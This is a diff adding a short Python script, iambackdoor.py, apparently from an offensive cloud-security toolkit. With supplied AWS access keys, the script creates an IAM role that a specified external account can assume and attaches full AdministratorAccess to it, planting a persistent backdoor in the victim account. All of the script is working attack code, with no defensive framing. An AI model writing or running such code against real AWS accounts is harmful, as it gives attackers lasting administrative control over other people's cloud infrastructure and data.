■ ■ ■ ■ ■ ■
clouds/aws/iambackdoor.py
| | 1 | + | import boto3 |
| | 2 | + | import json |
| | 3 | + | import time |
| | 4 | + | |
| | 5 | + | class backdoor: |
| | 6 | + | pass |
| | 7 | + | |
| | 8 | + | def attack(self, role, key, secret, account_id): |
| | 9 | + | iam = boto3.client("iam", |
| | 10 | + | aws_access_key_id= key, |
| | 11 | + | aws_secret_access_key=secret, |
| | 12 | + | region_name="us-east-2") |
| | 13 | + | assume_role_policy_document = json.dumps({ |
| | 14 | + | "Version": "2012-10-17", |
| | 15 | + | "Statement": [ |
| | 16 | + | { |
| | 17 | + | "Effect": "Allow", |
| | 18 | + | "Action": "sts:AssumeRole", |
| | 19 | + | "Principal": { |
| | 20 | + | "AWS": account_id |
| | 21 | + | }, |
| | 22 | + | "Condition": {} |
| | 23 | + | } |
| | 24 | + | ] |
| | 25 | + | }) |
| | 26 | + | |
| | 27 | + | response = iam.create_role( |
| | 28 | + | RoleName=role, |
| | 29 | + | AssumeRolePolicyDocument=assume_role_policy_document |
| | 30 | + | ) |
| | 31 | + | |
| | 32 | + | role_name = response["Role"]["RoleName"] |
| | 33 | + | time.sleep(5) |
| | 34 | + | response = iam.attach_role_policy( |
| | 35 | + | RoleName=role_name, |
| | 36 | + | PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" |
| | 37 | + | ) |
| | 38 | + | print("Backdoor role with Administrator access created - %s" %role_name) |
| | 39 | + | |
